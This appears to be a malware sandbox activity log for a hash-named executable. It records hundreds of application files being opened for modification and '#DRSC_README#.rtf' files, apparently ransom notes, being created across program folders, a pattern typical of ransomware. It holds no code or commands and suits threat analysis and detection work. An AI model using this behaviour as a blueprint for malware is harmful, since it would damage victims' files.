710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_folder-hover_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\optimize_poster.jpg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_basestyle.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\example_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\zh-cn_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-search_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fi_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\selection-actions2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-Regular.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pt-br\AppStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\LightTheme.acrotheme 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\vscroll-thumb.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons_ie8.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\Logo.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\index.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\SY______.PFB 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\LINEAR_RGB.pf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\NewSearch.ex_ 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\THANKS.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome_200_percent.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.text.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\error_window.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_bow.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\launcher.win32.win32.x86_64.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\RTC.der 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\close_x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\serialver.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_fr.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-down.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\OptimizePDF_R_RHP.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_remove_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\mosaic_window.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\zh-hk_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_shared_single_filetype.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_unshare_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\faf_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Info.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_de_DE.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\convertpdf-rna-selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvm.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_closereview_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\vi_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\javadoc.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-It.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper.registry_1.0.300.v20130327-1442.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.commons.logging_1.1.1.v201101211721.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\s_thumbnailview_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_joined.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-disabled_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\new_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner-3x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\he-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fi-fi\#DRSC_README#.rtf 